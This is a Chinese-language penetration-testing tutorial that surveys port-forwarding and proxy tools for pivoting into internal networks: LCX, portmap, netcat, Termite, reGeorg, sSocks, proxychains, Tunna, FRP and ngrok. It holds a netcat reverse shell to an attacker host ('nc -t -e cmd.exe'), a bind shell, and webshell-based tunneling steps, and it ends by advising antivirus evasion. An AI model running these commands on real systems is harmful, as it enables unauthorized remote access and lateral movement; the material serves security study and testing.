内网渗透之端口转发与代理工具总结
字数 1488 2025-08-18 11:37:19
内网渗透之端口转发与代理工具详解
一、端口转发基础概念
在渗透测试中,当目标主机处于内网环境时,我们需要借助端口转发工具与目标主机建立通信通道。端口转发主要分为两种类型:
- 端口转发:将内网主机的端口流量转发到公网主机的指定端口
- 端口映射:将目标主机的受限端口映射到防火墙允许的其他端口
二、LCX工具详解
Windows版LCX
1. 内网端口转发
操作步骤:
-
在内网主机上执行:
lcx.exe -slave 公网主机IP 公网主机端口 内网主机IP 内网主机端口示例:将内网3389端口转发到公网主机的4444端口
lcx.exe -slave 公网主机IP 4444 127.0.0.1 3389 -
在公网主机上执行:
lcx.exe -listen 接收端口 转发端口示例:
lcx.exe -listen 4444 5555
连接方式:
- 公网主机操作:
mstsc /v:127.0.0.1:5555 - 本地主机操作:
mstsc /v:公网主机IP:5555
2. 本地端口转发
当3389端口被防火墙阻止时,可将其映射到允许的端口(如53):
lcx -tran 53 目标主机IP 3389
连接方式:mstsc /v:目标主机IP:53
Linux版Portmap
-
公网主机执行:
./portmap -m 2 -p1 6666 -h2 公网主机IP -p2 7777 -
内网主机执行:
./portmap -m 3 -h1 127.0.0.1 -p1 22 -h2 公网主机IP -p2 6666 -
连接方式:
ssh 公网主机IP 7777
三、NC工具使用
反向连接
-
公网主机监听:
nc -lvp 4444 -
内网主机执行:
nc -t -e cmd.exe 公网主机IP 4444
正向连接
-
远程主机执行:
nc -l -p 4444 -t -e cmd.exe -
本地主机连接:
nc -vv 远程主机IP 4444
四、Socks代理工具
1. Termite (EW升级版)
主要特性:
- 多平台支持
- 跳板机互联
- 正反向级联
- 内置Shell管理
使用方法:
-
客户端执行:
agent_windows_x86.exe -l 4444 -
管理端执行:
admin_windows_x86.exe -c 127.0.0.1 -p 4444 -
添加新agent:
agent_windows_x86.exe -c 127.0.0.1 -p 4444
常用命令:
show:查看拓扑结构goto [节点ID]:切换管理节点socks [端口]:开启Socks代理shell [端口]:绑定Shell到端口downfile [远程文件] [本地文件]:下载文件upfile [本地文件] [远程文件]:上传文件lcxtran [本地端口] [目标IP] [目标端口]:端口转发
2. reGeorg
特点:
- 通过HTTP/HTTPS隧道转发内网端口
- 需要目标服务器支持aspx/php/jsp
使用方法:
- 上传对应webshell到目标服务器
- 本地执行:
python proxy.py -u <webshell地址> -l <本地端口> [选项]
3. sSocks
组件功能:
nsocks:类似通过Socks5代理的netcatssocksd:开启Socks5代理服务ssocks:本地启用Socks5服务并反弹rcsocks:接收反弹的Socks5服务
使用方法:
-
公网主机执行:
./rcsocks -l 4444 -p 5555 -vv -
内网主机执行:
./rssocks -vv -s 公网主机IP:5555
4. proxychains
特点:
- Linux平台全局代理工具
- 支持HTTP/SOCKS4/SOCKS5代理
- 支持代理链
安装:
sudo apt-get update
sudo apt-get install proxychains
5. Tunna
使用前提:
- 能够在远程服务器上传webshell
使用方法:
python proxy.py -u http://10.3.3.1/test/conn.aspx -l 4444 -r 3389 -v
五、FRP内网穿透
特点:
- 高性能反向代理
- 支持TCP/UDP/HTTP/HTTPS
- 支持虚拟主机和自定义域名
服务端配置示例 (frps.ini):
[common]
bind_port = 7000
vhost_http_port = 80
dashboard_port = 7500
dashboard_user = admin
dashboard_pwd = password
客户端配置示例 (frpc.ini):
[common]
server_addr = xxx
server_port = 7000
[ssh]
type = tcp
local_port = 22
remote_port = 5555
启动命令:
- 服务端:
frps.exe -c frps.ini - 客户端:
frpc.exe -c frpc.ini
六、ngrok内网穿透
使用方法:
-
内网主机启动服务:
python -m SimpleHTTPServer 8089 -
启动ngrok:
ngrok.exe http 8089 -
访问生成的ngrok地址(如
http://xxxx.ngrok.io)
七、总结
本文详细介绍了内网渗透中常用的端口转发和代理工具,包括:
- LCX/Portmap:基础端口转发工具
- NC:简单反向Shell工具
- Socks代理套件:Termite、reGeorg、sSocks等
- FRP:高性能反向代理
- ngrok:便捷的内网穿透工具
在实际渗透测试中,应根据目标环境选择合适的工具组合,注意工具的免杀处理和网络环境限制。